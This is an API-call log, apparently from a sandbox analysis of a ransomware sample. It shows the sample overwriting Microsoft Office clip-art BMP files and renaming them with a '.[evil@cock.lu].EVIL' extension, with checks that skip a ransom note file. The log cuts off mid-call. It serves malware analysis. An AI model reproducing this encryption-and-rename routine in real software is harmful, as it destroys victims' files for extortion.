[0131.898] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101857.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101857.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0131.901] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7db8, lpOverlapped=0x0) returned 1 [0131.922] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.922] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.922] _errno () returned 0x84b1160840 [0131.922] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.922] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7dc0, lpOverlapped=0x0) returned 1 [0131.922] CloseHandle (hObject=0x1a8) returned 1 [0131.922] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101857.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0131.922] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0131.922] __uncaught_exception () returned 0x84b1160800 [0131.922] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0131.923] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101857.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101857.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101857.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101857.bmp.[evil@cock.lu].evil")) returned 1 [0131.923] ??_V@YAXPEAX@Z () returned 0x1 [0131.926] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101857.BMP", dwFileAttributes=0x200) returned 0 [0131.926] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0131.926] wcsstr (_Str="J0101858.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0131.926] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101858.BMP") returned 69 [0131.926] wcscmp (_String1="J0101858.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0131.926] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0101858.BMP") returned 0x0 [0131.926] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101858.BMP") returned 0x45 [0131.926] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101858.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101858.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0131.928] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7db8, lpOverlapped=0x0) returned 1 [0131.935] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.935] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.935] _errno () returned 0x84b1160840 [0131.935] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.935] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7dc0, lpOverlapped=0x0) returned 1 [0131.936] CloseHandle (hObject=0x1a8) returned 1 [0131.936] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101858.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0131.936] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0131.936] __uncaught_exception () returned 0x84b1160800 [0131.936] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0131.936] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101858.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101858.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101858.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101858.bmp.[evil@cock.lu].evil")) returned 1 [0131.937] ??_V@YAXPEAX@Z () returned 0x1 [0131.939] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101858.BMP", dwFileAttributes=0x200) returned 0 [0131.940] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0131.940] wcsstr (_Str="J0101859.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0131.940] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101859.BMP") returned 69 [0131.940] wcscmp (_String1="J0101859.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0131.940] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0101859.BMP") returned 0x0 [0131.940] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101859.BMP") returned 0x45 [0131.940] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101859.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101859.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0131.942] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7ce0, lpOverlapped=0x0) returned 1 [0131.985] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.985] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0131.985] _errno () returned 0x84b1160840 [0131.985] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.985] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x7d00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7d00, lpOverlapped=0x0) returned 1 [0131.985] CloseHandle (hObject=0x1a8) returned 1 [0131.985] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101859.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0131.986] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0131.986] __uncaught_exception () returned 0x84b1160800 [0131.986] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0131.986] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101859.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101859.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101859.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101859.bmp.[evil@cock.lu].evil")) returned 1 [0131.987] ??_V@YAXPEAX@Z () returned 0x1 [0131.989] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101859.BMP", dwFileAttributes=0x200) returned 0 [0131.990] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0131.990] wcsstr (_Str="J0101860.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0131.990] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101860.BMP") returned 69 [0131.990] wcscmp (_String1="J0101860.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0131.990] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0101860.BMP") returned 0x0 [0131.990] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101860.BMP") returned 0x45 [0131.990] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101860.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101860.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0131.991] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7db8, lpOverlapped=0x0) returned 1 [0132.014] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0132.014] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0132.014] _errno () returned 0x84b1160840 [0132.014] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.014] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7dc0, lpOverlapped=0x0) returned 1 [0132.015] CloseHandle (hObject=0x1a8) returned 1 [0132.015] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101860.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0132.015] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0132.015] __uncaught_exception () returned 0x84b1160800 [0132.015] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0132.015] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101860.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101860.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101860.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101860.bmp.[evil@cock.lu].evil")) returned 1 [0132.016] ??_V@YAXPEAX@Z () returned 0x1 [0132.019] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101860.BMP", dwFileAttributes=0x200) returned 0 [0132.019] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0132.019] wcsstr (_Str="J0101861.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0132.019] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101861.BMP") returned 69 [0132.019] wcscmp (_String1="J0101861.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0132.019] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0101861.BMP") returned 0x0 [0132.019] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101861.BMP") returned 0x45 [0132.019] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101861.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101861.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0132.030] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7db8, lpOverlapped=0x0) returned 1 [0132.067] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0132.067] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0132.067] _errno () returned 0x84b1160840 [0132.067] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.067] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7dc0, lpOverlapped=0x0) returned 1 [0132.067] CloseHandle (hObject=0x1a8) returned 1 [0132.067] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101861.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0132.068] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0132.068] __uncaught_exception () returned 0x84b1160800 [0132.068] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0132.068] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101861.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101861.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101861.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101861.bmp.[evil@cock.lu].evil")) returned 1 [0132.069] ??_V@YAXPEAX@Z () returned 0x1 [0132.071] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101861.BMP", dwFileAttributes=0x200) returned 0 [0132.071] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0132.071] wcsstr (_Str="J0101862.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0132.071] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101862.BMP") returned 69 [0132.071] wcscmp (_String1="J0101862.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0132.072] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0101862.BMP") returned 0x0 [0132.072] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101862.BMP") returned 0x45 [0132.072] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101862.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101862.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0132.078] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7db8, lpOverlapped=0x0) returned 1 [0132.095] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0132.095] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0132.095] _errno () returned 0x84b1160840 [0132.095] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.095] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7dc0, lpOverlapped=0x0) returned 1 [0132.095] CloseHandle (hObject=0x1a8) returned 1 [0132.096] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101862.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0132.096] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0132.096] __uncaught_exception () returned 0x84b1160800 [0132.096] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0132.096] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101862.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101862.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101862.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101862.bmp.[evil@cock.lu].evil")) returned 1 [0132.097] ??_V@YAXPEAX@Z () returned 0x1 [0132.099] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101862.BMP", dwFileAttributes=0x200) returned 0 [0132.100] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0132.100] wcsstr (_Str="J0101863.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0132.100] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101863.BMP") returned 69 [0132.100] wcscmp (_String1="J0101863.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0132.100] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0101863.BMP") returned 0x0 [0132.100] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101863.BMP") returned 0x45 [0132.100] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101863.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101863.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0132.102] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7db8, lpOverlapped=0x0) returned 1 [0132.285] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0132.285] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0132.285] _errno () returned 0x84b1160840 [0132.285] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.285] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7dc0, lpOverlapped=0x0) returned 1 [0132.285] CloseHandle (hObject=0x1a8) returned 1 [0132.286] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101863.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0132.286] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0132.286] __uncaught_exception () returned 0x84b1160800 [0132.286] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0132.286] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101863.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101863.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101863.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101863.bmp.[evil@cock.lu].evil")) returned 1 [0132.287] ??_V@YAXPEAX@Z () returned 0x1 [0132.290] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101863.BMP", dwFileAttributes=0x200) returned 0 [0132.290] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0132.290] wcsstr (_Str="J0101864.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0132.290] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101864.BMP") returned 69 [0132.290] wcscmp (_String1="J0101864.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0132.290] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0101864.BMP") returned 0x0 [0132.290] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101864.BMP") returned 0x45 [0132.290] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101864.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101864.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0132.291] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7ce0, lpOverlapped=0x0) returned 1 [0132.302] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0132.302] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0132.302] _errno () returned 0x84b1160840 [0132.302] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.302] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x7d00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7d00, lpOverlapped=0x0) returned 1 [0132.302] CloseHandle (hObject=0x1a8) returned 1 [0132.302] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101864.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0132.302] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0132.302] __uncaught_exception () returned 0x84b1160800 [0132.302] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0132.302] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101864.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101864.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101864.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101864.bmp.[evil@cock.lu].evil")) returned 1 [0132.303] ??_V@YAXPEAX@Z () returned 0x1 [0132.306] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101864.BMP", dwFileAttributes=0x200) returned 0 [0132.306] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0132.306] wcsstr (_Str="J0101865.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0132.306] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101865.BMP") returned 69 [0132.306] wcscmp (_String1="J0101865.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0132.306] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0101865.BMP") returned 0x0 [0132.306] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101865.BMP") returned 0x45 [0132.306] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101865.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101865.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0132.308] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, 